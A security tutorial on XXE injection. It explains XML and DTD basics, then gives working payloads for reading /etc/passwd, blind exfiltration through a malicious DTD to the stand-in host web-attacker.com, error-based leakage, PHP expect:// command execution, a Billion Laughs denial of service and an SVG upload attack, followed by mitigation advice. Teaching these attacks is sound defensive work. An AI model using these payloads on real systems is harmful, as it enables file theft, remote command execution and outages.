In the world of web development, the Extensible Markup Language (XML) plays a pivotal role, and it is useful to those who wish to make use of web technologies for distributing information. One of the reasons that XML is so popular is the fact that it offers important features like Independent Data Exchange, Metadata Applications, Web Publishing, and Custom Tags. Although XML is similar to HTML, HTML was designed for data displays with an emphasis on the appearance of data. The XML was designed to carry data with a focus on how data is expressed.
An XML External Entity Injection vulnerability would allow an attacker to manipulate XML data in an application. In this case, an attacker has the capability to view the application server file system and interact with any external or back-end systems that the application can access. To understand the XXE injection vulnerability we must have knowledge of some basic concepts.
XML is a markup language, which provides you with the ability to create your own tags as per your need. Additionally, it has the advantage of allowing data to be stored in a format that can be stored, searched, and shared in a more efficient way. The standardized XML syntax allows the recipient to parse XML data when it is shared or transmitted across different systems or platforms, locally or over the internet.
Let’s understand how an XML document is structured.
XML documents consist of element trees. The XML tree begins with a root element and branches from there to child elements. There can be sub-elements within elements.
<root>
<child>
<subchild>.....</subchild>
</child>
</root>
“DTD” stands for Document Type Definition, which defines the structure of an XML document. It contains a list of legal elements and defines the structure with the help of those elements. The DTD is declared within the DOCTYPE element.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE body [
<!ENTITY message "This is a sample XML Document.">
]>
<body>
<message> &message; </message>
</body>
This is how the above example is interpreted.
<?xml version=”1.0″ encoding=”UTF-8″?> – xml represents transmission of the meta-data of a document. It is not a tag.
DOCTYPE – specifies a DTD for XML documents, here we can declare elements, attributes, and notations.
ENTITY – it is used to declare the Entity. As shown above, a message is the entity name.
The elements are used for describing the data, an XML element is a user-defined container that stores text elements and attributes. It is possible for XML elements to have other elements inside them as their content, like nested.
Syntax
<element-name attribute1 attribute2>
..content..
</element-name>
Entities are used to represent the item of data in the XML document, instead of the data itself. They are used to define shortcuts to special characters. Entities can be declared internal or external.
Syntax
<!ENTITY entity-name "entity-value">
Syntax
<!ENTITY entity-name SYSTEM "URI/URL">
Syntax
<!ENTITY % ename "entity_value">
Web applications use the XML format to transmit data between the browser and the server. In some applications, this is done virtually and the XML data on the server is always processed via a standard library or platform API.
There are several dangerous features in the XML specification, and some standard parsers support them even though they are rarely used by applications. XXE vulnerabilities result from this. and XML also has functionality which supports external entities. external entities are custom types of entities whose defined values are loaded from outside of the DTD in which they are declared. when an application allows an attacker to interfere with the application processing of XML then XML external entity vulnerability arises.
To retrieve arbitrary file through XML injection we need to modify XML in 2 ways:
Let’s understand better using an example.
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>
The Application has stock check functionality for the product which retrieves the data from the server, the application hasn’t implemented any prevention measures against the user input validation, by providing the below XML as input we can fetch the content of /etc/passwd file.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
In the above XML communication with the server, we have an external entity called xxe. And by providing the path of /etc/passwd we have retrieved its content.
The XML uses the entity within the productId value. This causes the application’s response to include the contents of the file.
Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
We can find blind XXE via out of band techniques and through error messages too, but it just shows the presence of vulnerability. To exploit it further we have to exfiltrate sensitive data through different techniques.
In this case, we have to host malicious DTD on the system they control and then we have to invoke external DTD within our in-band payload. A DTD can exfiltrate sensitive contents of /etc/passwd file.
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
The file is an entity in XML that represents the contents of the /etc/passwd file. An XML parameter entity named “eval“, provides the definition of another parameter entity called “exfiltrate“, which is a dynamic declaration of the XML parameter entity. To evaluate an exfiltrate entity, an HTTP request will be made to the attacker’s web server containing the value of the file entity within the URL query string. DTD uses the eval entity to perform the dynamic declaration of the exfiltrate entity. It has the exfiltrate entity so that its value is evaluated by requesting the specified URL.
Hosting Malicious DTD:
Now we have to load it onto our own web server.
So, for example, our URL will be,
http://web-attacker.com/malicious.dtd
The last Step to submit XXE payload in vulnerable application/web application
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"http://web-attacker.com/malicious.dtd"> %xxe;]
This XXE payload declares an XML parameter entity which is known as XXE. Then it uses the entity within the DTD. Because of this, the XML parser will fetch the external DTD from the attacker’s server and interpret it directly. The steps defined in the malicious DTD will then be executed, and the /etc/passwd file will be transmitted to the attacker’s server.
To exploit blind XXE, we have to trigger an XML parsing error from which an error message will pop up and it will contain the sensitive data that we wish to retrieve.
Note that this will work if the application returns the error message in its response.
We can trigger an XML parsing error message which will contain the contents of the /etc/passwd file, using a malicious external DTD as follows:
<!ENTITY % file SYSTEM file:///etc/passwd>
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
It has an XML parameter entity called “file”, containing the contents of the /etc/passwd file. Next, it has an XML parameter entity called “eval”, which contains a dynamic declaration of another XML parameter entity called “error”. The error entity will be evaluated by loading a non-existent file whose name contains the value of the file entity. DTD has an eval entity, which causes the dynamic declaration of the error entity to be performed. We have an error entity in DTD so that its value is evaluated by attempting to load the nonexistent file, it will be resulting in an error message which will be containing the name of the nonexistent file, which is the contents of the /etc/passwd file.
So, after all steps, we will be seeing error messages like,
java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
If the server is vulnerable to XXE using PHP and has the expected plugin installed then it may be vulnerable to such type of attack. Here we have to use the “expect” plugin. It is designed to allow applications to run cmd commands and interact with them. Moreover, this plugin allows for using expect:// filter in URI. And hence we can use this in the XXE attack.
The idea is very simple we have to provide expect://id URI for XML external entity and PHP will execute Id and in response, it will return an output of the command.
<?xml version="1.0"?>
<!DOCTYPE hacks [
<!ENTITY cmd SYSTEM "expect://id" >
]>
<secboat>&cmd;</secboat>
Now, what will happen is, here id command will get executed on the system and we will get the result in secboat tags. This will let the attacker know what privileges will be available for the next file requests or commands.
A Billion Laughs Attack is yet another vulnerability associated with XML parsing. This attack is carried out using the expansion property of the DTD language.
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
Here the entity keeps getting resolved to itself cyclically thereby slowing down requests and causing a DOS attack on the application.
Now let’s see what this DTD contains
The single lol9 entity will be replaced by 10 lol8 entities. Which are each replaced by 10 lol7 entities. And so on it goes. In cyclic resolutions of the entity, the application becomes affected by a DOS attack because requests get resolved cyclically.
Some applications allow users to upload files that are processed on the server. Document formats like DOCX and image formats like SVG use XML or contain XML subcomponents. Even if an application expects JPEG or PNG files, it may still accept SVG files and process them. Since SVG files use XML, there can be an injection through XXE in XML files.
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="228px" height="228px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="12" x="0" y="13">
&xxe;
</text>
</svg>
Again, the same format for the other XXE payloads applies here. We create the tag for DOCTYPE, create the entity and reference the file that we want to access. The next part is the SVG tag that “creates” our image. We create the size of the image and then within it create a text tag to place some custom text. However, the custom text is the reference to the entity that we created: &xxe; and this will then force the server to process this data, create the image and place the contents of /etc/passwd inside of it.
HTML forms generate a default content type, such as application/x-www-form-urlencoded, for POST requests. Besides accepting requests in this format, some websites may also process other types of content, such as XML. If a normal request contains the following:
POST /profile HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
user=1337
and you submit the same request in XML format:
POST /profile HTTP/1.0
Content-Type: text/html
Content-Length: 7
<?xml version="1.0" encoding="UTF-8"><userid>1337</userid>
If the server accepts this then you have just found another surface to inject some malicious XML.
Identification and mitigation of XXE require developer training. Furthermore, preventing XXE requires:
As a general rule, XXE attacks can be prevented by disabling features that make the XML processor vulnerable. Identifying and disabling the features that can be misused within the application can be done by analysing the XML parsing library, here is OWASP XXE Prevention cheat sheet.
Avoid serializing sensitive data and use fewer complex data formats such as JSON whenever possible.
Integrate whitelisting server-side input validation, filtering, or sanitization to prevent hostile data from being entered into XML documents, headers, or nodes.
The application and underlying operating system should be patched or upgraded on any XML processors and libraries used. Ensure that dependencies are checked. Updating SOAP to 1.2 or higher is recommended.
Validate the incoming XML with XSD validation or similar for XML file upload functionality. User inputs and URLs must be sanitized, validated, and approved before being uploaded to the server.
For detection, monitoring, and blocking XXE attacks, use virtual patching, API security gateways, Web application firewalls (WAF), and Interactive Application Security Testing (IAST) tools.
XXE Injection vulnerabilities can be highly destructive if exploited successfully by attackers. Besides degrading application availability, this will also place a system at risk for various types of attacks and data exfiltration. A strong web application security strategy should consist of protecting applications from XML external entity vulnerabilities.